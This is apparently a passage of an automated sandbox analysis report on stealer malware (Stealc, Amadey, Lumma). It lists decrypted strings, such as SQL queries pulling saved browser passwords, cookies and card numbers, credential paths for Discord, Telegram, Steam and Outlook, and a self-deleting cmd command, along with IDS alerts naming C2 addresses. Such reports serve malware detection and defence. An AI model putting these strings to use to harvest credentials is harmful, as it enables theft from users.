                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_column_text
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_finalize
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_close
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_column_bytes
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_column_blob
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: encrypted_key
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: PATH
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: NSS_Init
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: NSS_Shutdown
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: PK11_GetInternalKeySlot
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: PK11_FreeSlot
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: PK11_Authenticate
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: PK11SDR_Decrypt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: C:\ProgramData\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: browser:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: profile:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: url:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: login:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: password:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Opera
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: OperaGX
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Network
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: cookies
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: .txt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: TRUE
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: FALSE
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: autofill
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: history
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: cc
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: name:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: month:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: year:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: card:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Cookies
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Login Data
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Web Data
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: History
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: logins.json
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: formSubmitURL
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: usernameField
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: encryptedUsername
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: encryptedPassword
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: guid
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: cookies.sqlite
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: formhistory.sqlite
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: places.sqlite
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: plugins
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Local Extension Settings
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Sync Extension Settings
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: IndexedDB
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Opera Stable
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Opera GX Stable
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CURRENT
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: chrome-extension_
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: _0.indexeddb.leveldb
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Local State
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: profiles.ini
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: chrome
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: opera
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: firefox
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: wallets
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %08lX%04lX%lu
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ProductName
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: x32
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: x64
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DisplayName
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DisplayVersion
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Network Info:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - IP: IP?
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Country: ISO?
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: System Summary:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - HWID:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - OS:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Architecture:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - UserName:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Computer Name:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Local Time:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - UTC:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Language:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Keyboards:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Laptop:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Running Path:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - CPU:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Threads:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Cores:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - RAM:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - Display Resolution:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: - GPU:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: User Agents:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Installed Apps:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: All Users:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Current User:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Process List:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: system_info.txt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: freebl3.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: mozglue.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: msvcp140.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: nss3.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: softokn3.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: vcruntime140.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Temp\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: .exe
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: runas
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: open
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: /c start
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %DESKTOP%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %APPDATA%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %LOCALAPPDATA%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %USERPROFILE%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %DOCUMENTS%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %PROGRAMFILES_86%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %RECENT%
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: *.lnk
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: files
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \discord\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Local Storage\leveldb
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Telegram Desktop\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: key_datas
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: D877F783D5D3EF8C*
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: map*
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: A7FDF864FBC10B77*
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: A92DAA6EA6F891F2*
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: F8806DD0C461824F*
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Telegram
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Tox
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: *.tox
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: *.ini
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Password
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 00000001
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 00000002
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 00000003
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 00000004
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Outlook\accounts.txt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Pidgin
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \.purple\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: accounts.xml
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: dQw4w9WgXcQ
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: token:
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Software\Valve\Steam
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SteamPath
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \config\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ssfn*
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: config.vdf
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DialogConfig.vdf
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: libraryfolders.vdf
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: loginusers.vdf
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Steam\
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: done
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: soft
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: \Discord\tokens.txt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: https
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: POST
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HTTP/1.1
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Content-Disposition: form-data; name="
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: hwid
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: build
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: token
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: file_name
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: file
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: message
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: screenshot.jpg
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_dce40cc9-8
                                  Source: ebjtOH70jl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49818 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49826 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49837 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49848 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49861 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49866 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49883 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49898 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49910 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49913 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49931 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49934 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49945 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49955 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49974 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49988 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:50004 version: TLS 1.2
                                  Source: Binary string: mozglue.pdbP source: stealc_valenciga.exe, 0000000B.00000002.2616003523.000000006C01D000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: nss3.pdb@ source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: client_jackbastadguy.exe, 00000017.00000002.2816737184.00007FFE02CE5000.00000002.00000001.01000000.00000023.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: client_jackbastadguy.exe, 00000017.00000002.2810199165.00007FFDFB56F000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800440809.000002103CE50000.00000002.00000001.01000000.00000018.sdmp
                                  Source: Binary string: mozglue.pdb source: stealc_valenciga.exe, 0000000B.00000002.2616003523.000000006C01D000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: client_jackbastadguy.exe, 00000017.00000002.2826550918.00007FFE11BF0000.00000002.00000001.01000000.00000019.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: client_jackbastadguy.exe, 00000017.00000002.2817198633.00007FFE0C0BC000.00000002.00000001.01000000.0000003C.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: client_jackbastadguy.exe, 00000017.00000002.2811502404.00007FFDFB9A3000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: client_jackbastadguy.exe, 00000017.00000002.2810199165.00007FFDFB56F000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826137537.00007FFE115FC000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826137537.00007FFE115FC000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2828840841.00007FFE13303000.00000002.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2814383023.00007FFE02C5C000.00000002.00000001.01000000.0000003B.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: client_jackbastadguy.exe, 00000017.00000002.2816737184.00007FFE02CE5000.00000002.00000001.01000000.00000023.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2825920370.00007FFE11518000.00000002.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: client_jackbastadguy.exe, 00000017.00000002.2825303951.00007FFE1024D000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: nss3.pdb source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: client_jackbastadguy.exe, 00000016.00000003.2709953421.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826756351.00007FFE11EB1000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826359531.00007FFE11BCD000.00000002.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826946148.00007FFE12E16000.00000002.00000001.01000000.00000020.sdmp
                                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: client_jackbastadguy.exe, 00000017.00000002.2810199165.00007FFDFB5F1000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: client_jackbastadguy.exe, 00000017.00000002.2820647337.00007FFE0EB52000.00000002.00000001.01000000.00000024.sdmp
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: number of queries: 1001
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_004736A9 FindFirstFileExW,6_2_004736A9
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_0047375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_0047375A
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: chrome.exeMemory has grown: Private usage: 11MB later: 40MB

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49770 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49791 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.4:49770
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49807 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:52985 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49820 -> 185.215.113.16:80
